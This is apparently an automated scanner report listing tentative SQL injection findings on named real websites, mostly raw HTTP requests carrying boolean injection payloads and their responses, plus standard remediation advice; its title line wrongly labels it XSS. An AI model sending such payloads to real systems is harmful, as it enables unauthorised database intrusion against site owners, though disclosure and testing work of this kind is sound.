XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09042011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://stat.synergy-e.com/piwik.php [site parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://stat.synergy-e.com
Path:	/piwik.php

Issue detail

The site parameter appears to be vulnerable to SQL injection attacks. The payloads 74761117'%20or%201%3d1--%20 and 74761117'%20or%201%3d2--%20 were each submitted in the site parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /piwik.php?action_name=Thai%20Politics%2C%20fuel%20prices%20in%20Thailand%2C%20Thaksin%2C%20Government%20policies%2C%20Gold%20price%2C%20Thailand%20travel%2C%20Thai%20government%2C%20Yingluck%20Shinawatra%2C%20thai%20Politics%2C%20About%20Thailand%2C%20Cambodia%20border%20dispute%2C%20germany%20case%2C%20parliament%2C%20TOT%203G%2C%20Thai%20election%20result%2C%20Thai-Cambodia%20border%20dispute%2C%20cabinet%20formation%2C%20Thailand%20politics%2C%20thai%20election%2C%20Pueathai%20cabinet%2C%20Cambodia%2C%20election%20result%20approval%2C%20Thaksin%20case%2C%20Abhisit%20resignation%2C%20Pueathai%20wins%2C%20cabinet%2C%20amnesty%2Cyingluck%20shinawatra%20%2C%20Abhisit%20resign%2C%20Thaksin%2C%20Thailand%20Democracy%2C%20Prime%20Minister%2C%20Thailand%20news%2C%20Thailand%20Election%20%2C%20thai%20government%2C%20Bangkok%20news%2C%20the%20nation%2C%20thailand%20travel%20%2CPattaya%20%2Cweather%20forecast%20%2C%20news%20the%20nation%2C%20Thai%20news%2C%20bangkok%20news%20-%20Nationmultimedia.com&site=www.nationmultimedia.com74761117'%20or%201%3d1--%20&idsite=&rec=1&r=040763&h=21&m=26&s=6&url=http%3A%2F%2Fwww.nationmultimedia.com%2F&urlref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&_id=a4f1af5acb69be64&_idts=1315103167&_idvc=1&_idn=1&_refts=1315103167&_viewts=1315103167&_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&pdf=1&qt=1&realp=0&wma=0&dir=0&fla=1&java=1&gears=0&ag=1&res=1920x1200&cookie=1 HTTP/1.1
Host: stat.synergy-e.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:32:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Access-Control-Allow-Origin: *
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

Request 2

GET /piwik.php?action_name=Thai%20Politics%2C%20fuel%20prices%20in%20Thailand%2C%20Thaksin%2C%20Government%20policies%2C%20Gold%20price%2C%20Thailand%20travel%2C%20Thai%20government%2C%20Yingluck%20Shinawatra%2C%20thai%20Politics%2C%20About%20Thailand%2C%20Cambodia%20border%20dispute%2C%20germany%20case%2C%20parliament%2C%20TOT%203G%2C%20Thai%20election%20result%2C%20Thai-Cambodia%20border%20dispute%2C%20cabinet%20formation%2C%20Thailand%20politics%2C%20thai%20election%2C%20Pueathai%20cabinet%2C%20Cambodia%2C%20election%20result%20approval%2C%20Thaksin%20case%2C%20Abhisit%20resignation%2C%20Pueathai%20wins%2C%20cabinet%2C%20amnesty%2Cyingluck%20shinawatra%20%2C%20Abhisit%20resign%2C%20Thaksin%2C%20Thailand%20Democracy%2C%20Prime%20Minister%2C%20Thailand%20news%2C%20Thailand%20Election%20%2C%20thai%20government%2C%20Bangkok%20news%2C%20the%20nation%2C%20thailand%20travel%20%2CPattaya%20%2Cweather%20forecast%20%2C%20news%20the%20nation%2C%20Thai%20news%2C%20bangkok%20news%20-%20Nationmultimedia.com&site=www.nationmultimedia.com74761117'%20or%201%3d2--%20&idsite=&rec=1&r=040763&h=21&m=26&s=6&url=http%3A%2F%2Fwww.nationmultimedia.com%2F&urlref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&_id=a4f1af5acb69be64&_idts=1315103167&_idvc=1&_idn=1&_refts=1315103167&_viewts=1315103167&_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&pdf=1&qt=1&realp=0&wma=0&dir=0&fla=1&java=1&gears=0&ag=1&res=1920x1200&cookie=1 HTTP/1.1
Host: stat.synergy-e.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:32:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Content-Length: 867
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>&rsaquo; Error</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <link rel="shortcut icon" href="plugins/CoreHome/templates/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="themes/default/simple_structure.css" />
</head>
<body>
<div id="content">
   <div id="title"><img title='UnitusX' alt="UnitusX" src='themes/default/images/logo-header.png' style='margin-left:10px' /><span id="subh1"> # <a href='http://piwik.org/'>web analytics</a></span></div>
<p>Invalid idSite</p><p>Edit the following line in piwik.php to enable tracker debugging and display a backtrace:</p>
                   <blockquote><pre>$GLOBALS['PIWIK_TRACKER_DEBUG'] = true;</pre></blockquote></div>
</body>
</html>

1.2. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/index.htm/x26amp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15566219'%20or%201%3d1--%20 and 15566219'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news15566219'%20or%201%3d1--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:45 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news15566219' or 1=1-- /index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news15566219'%20or%201%3d2--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 22
Date: Sun, 04 Sep 2011 04:40:14 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.3. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/index.htm/x26amp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21868853'%20or%201%3d1--%20 and 21868853'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/index.htm21868853'%20or%201%3d1--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:52 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/index.htm21868853' or 1=1-- /x26amp
on this server.</p>
</body></html>

Request 2

GET /news/index.htm21868853'%20or%201%3d2--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 30
Date: Sun, 04 Sep 2011 04:40:22 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.4. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/index.htm/x26amp

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20529597'%20or%201%3d1--%20 and 20529597'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/index.htm/x26amp20529597'%20or%201%3d1--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/index.htm/x26amp20529597' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /news/index.htm/x26amp20529597'%20or%201%3d2--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:59 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>National News, International News, Foreign Stories, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of news from MiD DAY, the latest happenings from All around the globe and Mumbai, Bangalore, Delhi, Pune and the rest of India. Read the latest Mumbai News, Mumbai City News, Bangalore City News, latest Bangalore News, Delhi City News, latest Delhi News, Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="International News, Foreign Stories, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore, bombay, new delhi">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#polliframe {height: 250px;}
#masthead .mm1 {color:#fff; background-colo
...[SNIP]...

1.5. http://www.mid-day.com/news/index.htm/x26amp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/index.htm/x26amp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10092521%20or%201%3d1--%20 and 10092521%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/index.htm/x26amp?110092521%20or%201%3d1--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 223
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news/index.htm/x26amp?110092521%20or%201%3d2--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:36 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>National News, International News, Foreign Stories, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of news from MiD DAY, the latest happenings from All around the globe and Mumbai, Bangalore, Delhi, Pune and the rest of India. Read the latest Mumbai News, Mumbai City News, Bangalore City News, latest Bangalore News, Delhi City News, latest Delhi News, Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="International News, Foreign Stories, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore, bombay, new delhi">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#polliframe {height: 250px;}
#masthead .mm1 {color:#fff; background-colo
...[SNIP]...

1.6. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/local/index.htm/x26amp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20746183'%20or%201%3d1--%20 and 20746183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news20746183'%20or%201%3d1--%20/local/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news20746183' or 1=1-- /local/index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news20746183'%20or%201%3d2--%20/local/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 13
Date: Sun, 04 Sep 2011 04:40:05 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.7. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/local/index.htm/x26amp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11545130'%20or%201%3d1--%20 and 11545130'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local11545130'%20or%201%3d1--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:44 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local11545130' or 1=1-- /index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news/local11545130'%20or%201%3d2--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 21
Date: Sun, 04 Sep 2011 04:40:13 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.8. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/local/index.htm/x26amp

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20305888'%20or%201%3d1--%20 and 20305888'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

